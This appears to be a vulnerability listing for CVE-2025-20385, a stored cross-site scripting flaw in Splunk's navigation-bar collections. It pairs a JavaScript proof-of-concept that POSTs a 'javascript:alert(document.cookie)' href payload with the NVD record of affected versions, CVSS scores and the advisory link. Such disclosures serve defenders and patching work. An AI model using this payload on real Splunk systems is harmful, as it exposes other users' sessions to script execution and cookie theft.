CVE-2025-20385

// CVE-2025-20385 PoC - Splunk Stored XSS in Navigation Collection // Requires admin_all_objects privilege const splunkEndpoint = 'https://target-splunk.com:8089/servicesNS/nobody/search/data/ui/collections'; const authToken = 'YOUR_AUTH_TOKEN_HERE'; // Malicious payload for href attribute XSS const maliciousPayload = { "collectionName": "malicious_collection", "entry": { "name": "evil_link", "content": { "href": "javascript:alert(document.cookie)", "label": "Click Me" } } }; async function exploit() { try { // Step 1: Create malicious collection entry const createResponse = await fetch(splunkEndpoint, { method: 'POST', headers: { 'Authorization': `Splunk ${authToken}`, 'Content-Type': 'application/json' }, body: JSON.stringify(maliciousPayload) }); if (createResponse.ok) { console.log('[+] Malicious collection entry created successfully'); console.log('[+] XSS payload injected into href attribute'); console.log('[+] Any user viewing this collection will trigger the XSS'); } } catch (error) { console.error('[-] Exploitation failed:', error.message); } } exploit();

{"cve": {"id": "CVE-2025-20385", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:50.910", "lastModified": "2025-12-05T18:13:10.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, a user who holds a role with a high privilege capability `admin_all_objects` could craft a malicious payload through the href attribute of an anchor tag within a collection in the navigation bar, which could result in execution of unauthorized JavaScript code in the browser of a user."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.6, 10.0.2503.7 y 9.3.2411.117, un usuario que posee un rol con una capacidad de alto privilegio 'admin_all_objects' podría crear una carga útil maliciosa a través del atributo href de una etiqueta de anclaje dentro de una colección en la barra de navegación, lo que podría resultar en la ejecución de código JavaScript no autorizado en el navegador de un usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.117", "matchCriteriaId": "055D722F-3C2C-45FF-B44F-FD73820F2A78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.7", "matchCriteriaId": "B89283BD-7B81-43D8-84D3-0D9B744E5824"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.6", "matchCriteriaId": "C54FA9B3-9E2A-4D99-8432-C39D3EC79507"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1204", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}